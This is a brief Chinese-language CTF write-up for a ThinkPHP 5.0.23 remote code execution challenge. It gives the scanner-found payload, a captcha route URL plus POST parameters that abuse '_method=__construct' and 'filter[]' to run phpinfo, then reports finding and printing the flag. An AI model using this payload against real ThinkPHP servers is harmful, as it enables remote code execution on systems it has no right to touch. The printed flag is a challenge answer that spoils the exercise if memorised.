[ThinkPHP]5.0.23-Rce 1 根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器 检测出Payload url地址: ?s=captcha&test=-1 Post表单参数: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1 HackBar构造payload,访问成功执行到phpinfo页面 ctrf+f 成功找到flag flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}